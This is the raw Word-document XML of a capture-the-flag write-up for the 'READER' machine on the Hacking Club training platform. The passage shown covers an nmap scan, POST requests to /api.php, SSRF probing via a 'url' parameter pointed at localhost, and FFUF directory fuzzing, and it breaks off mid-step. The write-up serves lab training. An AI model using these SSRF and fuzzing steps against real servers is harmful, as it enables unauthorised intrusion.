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pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.md5x29xlq8di" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:br w:type="page"/>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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.w1hcz8xjrvf5" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Hacking Club</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000005">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Hacking Club is a platform to learn cybersecurity, an incredible resource if you don’t know where to start. In addition to vulnerable machines, you have access to classes and challenges to practice your skills and access to an exclusive community to play and challenge yourself.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000006">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.6gjyyfwyiu02" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The best part about </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Hacking Club</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is that it is very hands-on. If you are new to hacking, give it a try.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000007">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.le3alcaxdf4o" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000008">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This write-up refers to the </w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">READER</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine.If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">support channel on the Discord server</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000009">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="80" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.stjmpqensauk" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Nmap Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000A">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need to know which services are running in the background and which ports are open. So, we will use a tool called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000B">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540000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="25400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4241800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="61" name="image17.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image17.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="424180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0E">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Scrolling down the page, we can see the services, and something that catches my attention is the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">API service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">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3949700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62" name="image18.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image18.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="394970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spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Clicking on API, we are redirected to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000011">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185209"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="56" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image3.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="35557" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2185209"/>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receive the following message saying that it only accepts </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST requests</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. We will intercept this request with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Burp</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and send a request using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">POST </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">method.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000013">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781300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="63"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5943600"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Sending a POST request, we receive our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">first flag</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> =), and it also returns a message saying that the parameter </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">is missing. So we will set the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Mono" w:cs="Roboto Mono" w:eastAsia="Roboto Mono" w:hAnsi="Roboto Mono"/>
          <w:color w:val="188038"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">url</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> parameter and send another request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000015">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489200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72" name="image19.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image19.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="248920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Passing a single character returns </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">200 OK</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Since it is asking for a URL, we can deduce that this is an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF (Server Side Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. At this point, I will pass the internal IP (localhost) of the server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000017">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3060700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74" name="image28.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image28.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="306070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It returns an output that is saved in a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> file, but we do not know which directory it is saved in. For this, we will perform directory fuzzing to discover it. I will use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FFUF</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tool.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000019">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832100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="50"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5943600" cy="283210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find a directory → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/logfiles</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
